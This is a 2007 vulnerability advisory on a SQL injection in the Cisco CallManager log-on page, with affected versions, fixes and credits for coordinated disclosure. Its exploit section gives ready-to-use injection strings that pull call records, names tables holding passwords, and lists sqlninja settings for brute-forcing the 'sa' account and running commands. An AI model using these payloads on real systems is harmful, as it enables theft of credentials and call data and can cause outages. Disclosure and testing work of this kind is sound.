SQL Injection in Cisco CallManager


SUMMARY ======= A SQL injection vulnerability exists in the Log On page of the web interface for Cisco CallManager AKA Unified Communications Manager. An unauthenticated attacker who is able to access the Log On page could exploit this vulnerability to run arbitrary SQL commands as the logged in database user, usually cm_publisher. By running SQL commands, the attacker could gain information about the CallManager configuration, including call records. AFFECTED SOFTWARE ================= * Cisco CallManager prior to v3.3(5)sr2b * Cisco CallManager prior to v4.1(3)sr5 * Cisco CallManager prior to v4.2(3)sr2 * Cisco CallManager prior to v4.3(1)sr1 Note that I have not personally tested these products - I am simply reproducing Cisco's information on the issue. IMPACT ====== An attacker who is able to access the Log On page could harvest a large amount of data about the Cisco VOIP environment - 260 tables in two databases. Depending on the target system's configuration, this data may include sensitive information such as passwords (ccm0306..PilotUser.Password, ccm0306..syspublications.ftp_password, ccm0306..sysusers.password) and call records (cdr..CallDetailRecord.*). The default database user does not appear to have sufficient privileges to perform operations more destructive than simple SELECT statements - no INSERT, UPDATE, DELETE, DROP, etc. It may be possible to use attacks against the exposed MS SQL database in order to expand the impact of this vulnerability - see Advanced Exploitation, below. DETAILS ======= The log on page of the Cisco Unified CallManager web interface performs insufficient checking of the "lang" HTTP GET variable before passing it into a SQL query. By providing a specially crafted lang variable, an attacker could trick the backend MS SQL server into executing arbitrary SQL queries as the logged in user. The affected query returns only a single value, and that value is placed in a Javascript include URL which is not visible in the rendered HTML page. As a result, practical exploitation of this vulnerability can be difficult. Security professionals wishing to test the vulnerability against their own systems may wish to write wrapper code to make running repeated queries less tedious. SOLUTION ======== - Upgrade to an unaffected version of Cisco CallManager - Enable the URLScan ISAPI filter. This filter ships with CCM and restricts the maximum length of form fields, making this vulnerability difficult or impossible to exploit. EXPLOIT ======= To see the returned data from these exploit URLs, view the source of the returned page and look for a line like this: <SCRIPT language="javascript" src="locales/123/userwebdictionary.js"></SCRIPT> The string "123" is the value returned from the database. Examples: Display the logged-in database user.'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' Display the selected database.'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' Display the UNIX time at which a call was made from extension 12345.'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' Display the destination number for that call. Replace "1174900000" with the value from the previous query.'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' ADVANCED EXPLOITATION ===================== Several free tools exist to automate attacking SQL injection vulnerabilities like this one. Depending on the configuration of the target server, it may be possible to escalate database privileges or run arbitrary system commands. For example, icesurfer's excellent sqlninja tool (>= 0.1.3) can be used to detemine various information about the server hosting the CallManager install, launch a brute-force attack against the database "sa" account password, and run arbitrary commands on the server if the "sa" attack succeeds. http://sqlninja.sourceforge.net/ The following parameters should be specified in the sqlninja.conf file: page = /ccmuser/logon.asp stringstart = lang=en'; stringend = select tkUserLocale from UserLocaleBrowserLanguageMap M where ''=' appendcomment = no In at least one instance, an unsuccessful brute-force attack against the "sa" password led to denial-of-service conditions on the CallManager server. CREDITS ======= Brandeis University worked with Cisco to release this information in a responsible manner. Cisco has released a Security Advisory on this issue at: http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml I would also like to thank icesurfer for his work modifying sqlninja to work with this exploit. REVISION HISTORY ================ 2007-08-30 original release -- Elliot Kendall <ekendall@brandeis.edu> Network Security Architect Brandeis University Trouble replying? See http://people.brandeis.edu/~ekendall/sign/